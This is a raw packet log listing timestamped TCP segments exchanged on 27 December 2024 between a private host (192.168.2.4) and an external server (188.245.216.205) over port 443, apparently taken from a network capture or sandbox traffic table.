                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.649791956 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.649826050 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.649847984 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.649863005 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.650006056 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.650039911 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652241945 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652328014 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652430058 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652456999 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652465105 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652472973 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652597904 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.652640104 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.656949997 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.656991959 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.657095909 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.657121897 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.657255888 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.703330994 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.703457117 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.751339912 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794322014 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794574022 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794601917 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794609070 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794646978 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794733047 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794756889 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794811010 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794816017 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794868946 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794899940 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794912100 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794934988 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794965982 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794981956 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.794992924 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795011997 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795042992 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795051098 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795088053 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795093060 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795105934 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795111895 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795133114 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795145035 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795161009 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795195103 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795213938 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795223951 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795233011 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795245886 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795281887 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795289993 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795305014 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795342922 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795355082 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795383930 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795389891 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795424938 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795433044 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795469046 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795471907 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795485020 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795492887 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795504093 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795511007 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795547962 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795574903 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795588970 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795617104 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795640945 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795653105 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795660019 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795669079 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795669079 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795702934 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795722961 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795736074 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795741081 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795752048 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795780897 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795785904 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795834064 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795867920 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795896053 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.839356899 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.911895990 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912050009 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912085056 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912092924 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912208080 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912235022 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912235022 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912265062 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912369013 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912426949 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912426949 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912445068 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912503004 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912503004 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912553072 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912553072 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912597895 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912605047 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912612915 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912627935 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912645102 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912678003 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912720919 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912720919 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912754059 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912759066 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912770987 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912797928 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912807941 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912838936 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912839890 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912882090 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912892103 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912899017 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912920952 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912961006 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912961006 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912991047 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912996054 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913032055 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913084030 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913100004 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913155079 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913167953 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913266897 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913288116 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913309097 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913460016 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913494110 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.959322929 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.959440947 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.959474087 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.007343054 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.035057068 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.035172939 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.035200119 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.035204887 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.035221100 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.035252094 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.039171934 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.152447939 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.168893099 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524451971 CET44349802188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524470091 CET44349802188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524533987 CET49802443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524544954 CET44349802188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524558067 CET44349802188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524581909 CET49802443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524600983 CET49802443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524827957 CET49802443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.524837971 CET44349802188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.527090073 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.527101040 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.527167082 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.527391911 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:13.527404070 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.021667004 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.021738052 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.022188902 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.022197962 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.023957968 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.023963928 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.953891039 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.953919888 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.953990936 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.953993082 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.954010963 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.954045057 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.954407930 CET49808443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:15.954420090 CET44349808188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:19.053925991 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:19.053994894 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:19.054001093 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:19.054048061 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:19.055491924 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:19.055514097 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:26.593976021 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:26.594023943 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:26.594098091 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:26.594321966 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:26.594331980 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:27.617002964 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:27.617063046 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:27.617151022 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:27.617363930 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:27.617377996 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.002482891 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.002594948 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.003030062 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.003041029 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004774094 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004774094 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004791021 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004808903 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004856110 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004861116 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004894972 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:28.004914999 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.116906881 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.116986990 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.117396116 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.117405891 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.119447947 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.119455099 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.119472027 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.119479895 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.324137926 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.324199915 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.324212074 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.324228048 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.324275017 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.325145960 CET49838443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.325164080 CET44349838188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.666002989 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.666044950 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.666147947 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.666371107 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:29.666405916 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.167963028 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.168040991 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.168113947 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.168901920 CET49840443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.168922901 CET44349840188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.672909975 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.672941923 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.673018932 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.673263073 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:30.673280954 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.162266970 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.162477016 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.182749033 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.182780027 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185291052 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185336113 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185383081 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185398102 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258573055 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258652925 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258682013 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258740902 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259134054 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259212971 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259774923 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259784937 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259968996 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.260006905 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261531115 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261535883 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261574984 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261585951 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697452068 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697479010 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697650909 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697767019 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697783947 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.433552980 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.433646917 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.433866024 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.434853077 CET49849443192.168.2.4188.245.216.205
